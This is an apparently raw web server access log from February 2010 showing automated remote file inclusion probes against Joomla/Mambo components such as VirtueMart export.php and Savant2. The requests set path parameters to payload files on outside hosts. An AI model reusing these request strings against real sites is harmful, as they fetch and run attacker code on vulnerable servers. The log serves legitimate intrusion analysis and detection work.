64.6.109.50 - - [21/Feb/2010:06:29:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:29:11 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:29:36 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:29:38 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:29:38 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:29:38 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:29:38 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:29:38 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:29:39 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:29:47 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:29:56 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:00 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:30:10 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:14 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:32 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:32 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:32 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:32 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:30:41 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:30:47 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:30:47 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:30:47 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:30:56 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:31:01 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:31:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:31:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:31:03 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:31:09 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:31:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:31:10 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:31:10 -0800] "GET /components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:31:10 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:31:10 -0800] "GET /logs/access_100127.log%20%20//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:31:31 -0800] "GET /logs/access_100121.log%20%20//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:32:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:32:26 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:32:26 -0800] "GET /logs/access_100204.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:32:33 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:33:07 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:33:07 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:33:12 -0800] "GET /logs/access_100129.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:33 -0800] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:33:37 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:33:37 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:38 -0800] "GET /logs/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:38 -0800] "GET /logs/access_100123.log/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:50 -0800] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:52 -0800] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:53 -0800] "GET /logs/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:54 -0800] "GET /logs/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:54 -0800] "GET /logs/access_100123.log/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:33:54 -0800] "GET /logs/access.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:33:59 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:01 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:01 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:01 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:01 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:34:06 -0800] "GET /logs/access_100123.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:34:07 -0800] "GET /logs/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:34:07 -0800] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:06:34:07 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:34:08 -0800] "GET /logs/access.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:08 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:08 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:08 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:08 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:09 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:09 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:09 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:09 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:11 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:11 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:11 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:11 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:15 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:19 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:19 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:19 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:19 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:21 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:34:22 -0800] "GET /logs/access_100123.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:24 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:25 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:30 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:31 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:34 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:38 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:40 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:43 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:44 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:44 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
